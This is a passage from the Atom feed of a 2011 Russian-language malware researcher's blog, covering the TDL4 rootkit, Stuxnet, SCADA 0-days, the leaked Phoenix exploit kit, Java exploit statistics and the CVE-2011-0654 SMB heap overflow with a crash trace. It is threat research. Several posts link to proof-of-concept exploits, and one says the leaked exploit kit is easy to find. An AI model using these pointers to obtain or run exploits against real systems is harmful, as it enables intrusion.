x64</title><content type='html'>Вчера мы выпустили полный отчет по теме TDL4: "&lt;a href="http://www.eset.com/us/resources/white-papers/The_Evolution_of_TDL.pdf"&gt;&lt;b&gt;The Evolution of TDL: Conquering x64&lt;/b&gt;&lt;/a&gt;" [pdf]. Он характерно отличается от того, что есть на данный момент систематичностью излагаемого материала и его детализацией.&lt;br /&gt;&lt;br /&gt;Подробно рассмотрены не только аспекты внедрения и работы самого руткита, но и пути его распространения и кто за этим стоит.&lt;br /&gt;&lt;br /&gt;По данной теме планируется в ближайшее время два выступления, причем на CONFidence придется поехать сразу после доклада на &lt;a href="http://amatrosov.blogspot.com/2011/03/positive-hack-days-must-see.html"&gt;PHD&lt;/a&gt; :)  &lt;br /&gt;&lt;br /&gt;Мастер-класс "&lt;b&gt;Проведение криминалистической экспертизы и анализа руткит-программ на примере  TDL4&lt;/b&gt;" на &lt;a href="http://www.phday.ru/master-classes.asp#2"&gt;Positive Hack Days &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Доклад "&lt;b&gt;Defeating x64: The Evolution of the TDL Rootkit&lt;/b&gt;" на &lt;a href="http://2011.confidence.org.pl/agenda"&gt;CONFidence'2011 Krakow&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-5676415541338248751?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/5676415541338248751/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/03/evolution-of-tdl-conquering-x64.html#comment-form' title='Комментарии: 1'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5676415541338248751'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5676415541338248751'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/03/evolution-of-tdl-conquering-x64.html' title='The Evolution of TDL: Conquering x64'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-966692894980363870</id><published>2011-03-30T16:41:00.002+04:00</published><updated>2011-03-31T01:09:44.988+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='Reflections'/><title type='text'>Positive Hack Days - must see!</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-N82FZsr2u-Y/TZMj0e78_jI/AAAAAAAAA0E/uolptGTO-2E/s1600/logo1.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="141" width="275" src="http://3.bp.blogspot.com/-N82FZsr2u-Y/TZMj0e78_jI/AAAAAAAAA0E/uolptGTO-2E/s320/logo1.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Готовится крайне интересное &lt;a href="http://www.phday.ru"&gt;мероприятие&lt;/a&gt; и возможно у нас появится наконец хоть одна конфа с большим числом интересных докладов из которых можно извлечь для себя реальную пользу.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-966692894980363870?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/966692894980363870/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/03/positive-hack-days-must-see.html#comment-form' title='Комментарии: 3'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/966692894980363870'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/966692894980363870'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/03/positive-hack-days-must-see.html' title='Positive Hack Days - must see!'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-N82FZsr2u-Y/TZMj0e78_jI/AAAAAAAAA0E/uolptGTO-2E/s72-c/logo1.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4472025538716196477</id><published>2011-03-29T19:49:00.000+04:00</published><updated>2011-10-19T15:33:49.333+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Video'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='SCADA'/><category scheme='http://www.blogger.com/atom/ns#' term='Cyberwar'/><title type='text'>Ralph Langner o PLC Payload из Stuxnet</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Ralph Langner довольно неплохо разложил все по полочкам о PLC Payload из Stuxnet:&lt;br /&gt;&lt;br /&gt;&lt;object height="326" width="446"&gt;&lt;param name="movie" value="http://video.ted.com/assets/player/swf/EmbedPlayer.swf"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;param name="bgColor" value="#ffffff"&gt;&lt;/param&gt;&lt;param name="flashvars" value="vu=http://video.ted.com/talks/dynamic/RalphLangner_2011-medium.flv&amp;su=http://images.ted.com/images/ted/tedindex/embed-posters/RalphLangner-2011.embed_thumbnail.jpg&amp;vw=432&amp;vh=240&amp;ap=0&amp;ti=1107&amp;introDuration=15330&amp;adDuration=4000&amp;postAdDuration=830&amp;adKeys=talk=ralph_langner_cracking_stuxnet_a_21st_century_cyberweap;year=2011;theme=what_s_next_in_tech;theme=numbers_at_play;theme=bold_predictions_stern_warnings;theme=war_and_peace;theme=a_taste_of_ted2011;event=TED2011;&amp;preAdTag=tconf.ted/embed;tile=1;sz=512x288;" /&gt;&lt;embed src="http://video.ted.com/assets/player/swf/EmbedPlayer.swf" pluginspace="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" bgColor="#ffffff" width="446" height="326" allowFullScreen="true" allowScriptAccess="always" flashvars="vu=http://video.ted.com/talks/dynamic/RalphLangner_2011-medium.flv&amp;su=http://images.ted.com/images/ted/tedindex/embed-posters/RalphLangner-2011.embed_thumbnail.jpg&amp;vw=432&amp;vh=240&amp;ap=0&amp;ti=1107&amp;introDuration=15330&amp;adDuration=4000&amp;postAdDuration=830&amp;adKeys=talk=ralph_langner_cracking_stuxnet_a_21st_century_cyberweap;year=2011;theme=what_s_next_in_tech;theme=numbers_at_play;theme=bold_predictions_stern_warnings;theme=war_and_peace;theme=a_taste_of_ted2011;event=TED2011;"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4472025538716196477?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4472025538716196477/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/03/ralph-langner-o-plc-payload-stuxnet.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4472025538716196477'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4472025538716196477'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/03/ralph-langner-o-plc-payload-stuxnet.html' title='Ralph Langner o PLC Payload из Stuxnet'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4043442913303479024</id><published>2011-03-23T15:56:00.002+03:00</published><updated>2011-03-23T15:57:09.630+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='SCADA'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Безопасность SCADA все больше волнует исследователей</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-_fxDVY20NdI/TYnoXNc9PdI/AAAAAAAAAz0/sgFqua_vIoo/s1600/Olympic-Pipeline-Screenshot.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="286" src="http://1.bp.blogspot.com/-_fxDVY20NdI/TYnoXNc9PdI/AAAAAAAAAz0/sgFqua_vIoo/s400/Olympic-Pipeline-Screenshot.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;В последнее время все больше внимания привлекается к безопасности в области промышленных SCADA систем. Отчасти катализатором такого пристального внимания стал громкий инцидент с червем Stuxnet и беспрецедентными суммами нанесенного им ущерба.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;На недавно прошедшей в Мадриде конференции RootedCon'11 был представлен весьма интересный доклад "SCADA Trojans: Attacking the grid" по этой теме:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;- 0-day уязвимости в Advantech/BroadWin WebAccess SCADA&lt;/div&gt;&lt;div style="text-align: justify;"&gt;- архитектурные уязвимости в CSE-Semaphore TBOX RTUs&lt;/div&gt;&lt;div style="text-align: justify;"&gt;- рассмотрены различные вектора возможных атак&lt;/div&gt;&lt;br /&gt;&lt;a href="http://www.reversemode.com/downloads/Scada_Trojans_Ruben_Rootedcon.pdf"&gt;[слайды] SCADA Trojans: Attacking the grid&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.reversemode.com/downloads/exploit_advantech.zip"&gt;PoC код эксплойтов&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4043442913303479024?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4043442913303479024/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/03/scada.html#comment-form' title='Комментарии: 4'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4043442913303479024'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4043442913303479024'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/03/scada.html' title='Безопасность SCADA все больше волнует исследователей'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-_fxDVY20NdI/TYnoXNc9PdI/AAAAAAAAAz0/sgFqua_vIoo/s72-c/Olympic-Pipeline-Screenshot.jpg' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-6651369984829980406</id><published>2011-03-22T12:23:00.004+03:00</published><updated>2011-03-22T18:54:48.439+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Java'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Phoenix exploit kit 2.5 leaked</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Fi6hhDaE5_8/TYhmD74YgII/AAAAAAAAAzs/S7ndUzB-3u8/s1600/phoenix-exploit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="102" src="http://2.bp.blogspot.com/-Fi6hhDaE5_8/TYhmD74YgII/AAAAAAAAAzs/S7ndUzB-3u8/s400/phoenix-exploit.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Собственно сабж утек на днях на паблик и стал &lt;a href="https://twitter.com/#!/_MDL_/status/49531130763939841"&gt;достпен&lt;/a&gt; широкой общественности, ох не к добру ...&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Сейчас это наверное самый &lt;a href="http://www.malwaredomainlist.com/mdl.php?search=phoenix&amp;amp;colsearch=All&amp;amp;quantity=50"&gt;распространенный&lt;/a&gt; и наиболее часто утекающий сплойт-пак, но видимо это следствие вытекает из первого утверждения.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Ссылку на opensc.ws уже прибили, но при умении пользоваться гуглом и небольшой смекалке все находится достаточно быстро. Как я уже &lt;a href="http://amatrosov.blogspot.com/2011/02/java.html"&gt;писал&lt;/a&gt; ранее в последнее время Java стала одним из основных векторов client-side атак и здесь только подтверждается пристальное внимание и особая любовь к Java-сплойтам со стороны разработчиков.&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-6651369984829980406?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/6651369984829980406/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/03/phoenix-exploit-kit-25-leaked.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6651369984829980406'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6651369984829980406'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/03/phoenix-exploit-kit-25-leaked.html' title='Phoenix exploit kit 2.5 leaked'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-Fi6hhDaE5_8/TYhmD74YgII/AAAAAAAAAzs/S7ndUzB-3u8/s72-c/phoenix-exploit.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8627412825269638721</id><published>2011-03-15T13:27:00.002+03:00</published><updated>2011-03-15T13:29:48.015+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Video'/><category scheme='http://www.blogger.com/atom/ns#' term='Java'/><category scheme='http://www.blogger.com/atom/ns#' term='IE'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Использование связки эксплойтов</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Попалось мне тут под руку достаточно наглядное видео, демонстрирующее атаку с использованием связки эсплойтов (причем достаточно свежих) для успешного пробива конечной цели. В качестве атакующего софта используется Immunity CANVAS последней версии. Еще обратите внимание на демонстрацию обхода IE sandbox, где то в середине ролика.&lt;/div&gt;&lt;br /&gt;&lt;iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/1YdsabE34_M?rel=0&amp;amp;hd=1" title="YouTube video player" width="480"&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8627412825269638721?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8627412825269638721/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/03/blog-post.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8627412825269638721'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8627412825269638721'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/03/blog-post.html' title='Использование связки эксплойтов'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/1YdsabE34_M/default.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4977419089599245284</id><published>2011-03-09T16:38:00.001+03:00</published><updated>2011-03-15T13:28:16.920+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><title type='text'>Владельцы ботнета TDL4 стали продавать инсталы на инфицированных машинах?</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Недавно было &lt;a href="http://blog.eset.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs"&gt;замечено&lt;/a&gt;, что некоторые свежие сэмплы TDL4 тащат за собой всякое (Win32/Glupteba.E, Win32/Glupteba.D). Причем ставится эта малвара без использования возможностей самого руткита по сокрытию сторонних процессов в системе. TDL4 выполняет только команду &lt;i&gt;DownloadAndExecute&lt;/i&gt; и на этом его участие заканчивается.&lt;/div&gt;&lt;br /&gt;Троянцы &lt;b&gt;Win32/Glupteba.D&lt;/b&gt;, &lt;b&gt;Win32/Glupteba.E&lt;/b&gt;, нацелены на скликивания контекстной рекламы, особенно активно проявили себя относительно рекламной сети бегуна.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4977419089599245284?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4977419089599245284/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/03/tdl4.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4977419089599245284'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4977419089599245284'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/03/tdl4.html' title='Владельцы ботнета TDL4 стали продавать инсталы на инфицированных машинах?'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8950211407733270836</id><published>2011-02-18T17:14:00.002+03:00</published><updated>2011-03-15T13:28:39.590+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PDF'/><category scheme='http://www.blogger.com/atom/ns#' term='Java'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Пробив через Java по прежнему лидирует</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;По нашей &lt;a href="http://www.esetnod32.ru/.company/news/?id=35902&amp;amp;year=2010"&gt;статистике&lt;/a&gt; за последние несколько месяцев наблюдается высокий уровень концентрации среди детектов различных Java-эксплойтов. Причем не особо новых, но уровень пробива по ним очень высок (не по нашей статистике, а в принципе =)).  &lt;/div&gt;&lt;br /&gt;&lt;b&gt;...&lt;br /&gt;10) PDF/Exploit.Pidief.PDS.Gen        1,00%&lt;br /&gt;...&lt;br /&gt;18) Java/TrojanDownloader.Agent.NCA   0,73%&lt;br /&gt;...&lt;br /&gt;20) Java/Exploit.CVE-2010-0094.C      0,60%&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Выше наша статистика по России и СНГ, дженерик на PDF немного обогнал остальных, но по миру в целом, Java лидирует. Это подтверждают и данные из админок от некоторых сплойтпаков:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-CyMpn2AXxz4/TV58eoEmbaI/AAAAAAAAAy8/I5-T837oESY/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="138" src="http://1.bp.blogspot.com/-CyMpn2AXxz4/TV58eoEmbaI/AAAAAAAAAy8/I5-T837oESY/s400/1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8950211407733270836?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8950211407733270836/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/02/java.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8950211407733270836'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8950211407733270836'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/02/java.html' title='Пробив через Java по прежнему лидирует'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-CyMpn2AXxz4/TV58eoEmbaI/AAAAAAAAAy8/I5-T837oESY/s72-c/1.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4585398188316979639</id><published>2011-02-17T19:51:00.001+03:00</published><updated>2011-02-18T01:39:07.178+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>MS Windows SMB "mrxsmb.sys" Remote Heap Overflow</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Вчера появился &lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0654"&gt;CVE-2011-0654&lt;/a&gt; на уязвимость в переполнении кучи в процессе обработке специально подготовленных пакетов по протоколу Windows BROWSER, который работает поверх SMB. &lt;a href="http://www.exploit-db.com/exploits/16166/"&gt;PoC&lt;/a&gt; несколькими днями раньше и уже произвел резонанс в определенных кругах. Виной всему функция &lt;i&gt;BowserWriteErrorLogEntry()&lt;/i&gt; из mrxsmb.sys в которой собственно и происходит страшное:&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="vertical-align: top;"&gt;&lt;pre class="textmate-source-numbers" style="color: #999999; font-family: 'Bitstream Vera Sans Mono', Monaco, Consolas, 'Courier New', monospace; font-size: 9pt; line-height: 1.3em; margin-top: 0em; padding-right: 2em; text-align: right;"&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td style="vertical-align: top;"&gt;&lt;pre class="textmate-source" style="background-color: #141414; color: #f8f8f8; font-family: 'Bitstream Vera Sans Mono', Monaco, Consolas, 'Courier New', monospace; font-size: 9pt; line-height: 1.3em; margin-top: 0em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; word-wrap: break-word;"&gt;&lt;pre class="sunburst" style="font-family: 'Bitstream Vera Sans Mono', Monaco, Consolas, 'Courier New', monospace; font-size: 9pt; line-height: 1.3em; margin-top: 0em;"&gt;&lt;span class="meta meta_paragraph meta_paragraph_text" style="padding-bottom: 0.1em; padding-top: 0.2em;"&gt;&lt;br /&gt;mrxsmb!BowserWriteErrorLogEntry+0x174:&lt;br /&gt;f64d815a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]&lt;br /&gt;&lt;/span&gt;&lt;span class="meta meta_paragraph meta_paragraph_text" style="padding-bottom: 0.1em; padding-top: 0.2em;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="meta meta_paragraph meta_paragraph_text" style="padding-bottom: 0.1em; padding-top: 0.2em;"&gt;STACK_TEXT:  &lt;br /&gt;f78c27b0 80825b5b 00000003 e168a000 00000000 nt!RtlpBreakWithStatusInstruction&lt;br /&gt;f78c27fc 80826a4f 00000003 c070b450 8659fdb0 nt!KiBugCheckDebugBreak+0x19&lt;br /&gt;f78c2b94 80826de7 00000050 e168a000 00000000 nt!KeBugCheck2+0x5d1&lt;br /&gt;f78c2bb4 8085a533 00000050 e168a000 00000000 nt!KeBugCheckEx+0x1b&lt;br /&gt;f78c2c28 808868d0 00000000 e168a000 00000000 nt!MmAccessFault+0xa91&lt;br /&gt;f78c2c28 f64d815a 00000000 e168a000 00000000 nt!KiTrap0E+0xd8&lt;br /&gt;f78c2ccc f64d8ddc 40001f5b 00000000 f78c2cfc mrxsmb!BowserWriteErrorLogEntry+0x174&lt;br /&gt;f78c2d6c f649de02 85292008 8659fdb0 808a76c0 mrxsmb!HandleElectionWorker+0x2dc&lt;br /&gt;f78c2d80 8087ade9 00000000 00000000 8659fdb0 mrxsmb!BowserCriticalThreadWorker+0x32&lt;br /&gt;f78c2dac 809418f4 00000000 00000000 00000000 nt!ExpWorkerThread+0xeb&lt;br /&gt;f78c2ddc 80887f7a 8087acfe 00000000 00000000 nt!PspSystemThreadStartup+0x2e&lt;br /&gt;00000000 00000000 00000000 00000000 00000000 nt!KiThreadStartup+0x16&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div&gt;&lt;span class="meta meta_paragraph meta_paragraph_text" style="padding-bottom: 0.1em; padding-top: 0.2em;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;На самом деле все банально:&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;pre&gt;if ( Length &amp;gt; 0 )  &lt;br /&gt;    RtlCopyMemory(StringOffset, InsertionString, Length*sizeof(WCHAR));  &lt;/pre&gt;Vupen &lt;a href="http://www.vupen.com/english/advisories/2011/0394"&gt;подтвердила&lt;/a&gt; работу уязвимости для Win Server 2003 SP2 и WinXP SP3, а MS &lt;a href="http://blogs.technet.com/b/srd/archive/2011/02/16/notes-on-exploitability-of-the-recent-windows-browser-protocol-issue.aspx"&gt;утверждает&lt;/a&gt;, что в принципе этой уязвимости подвержены все версии 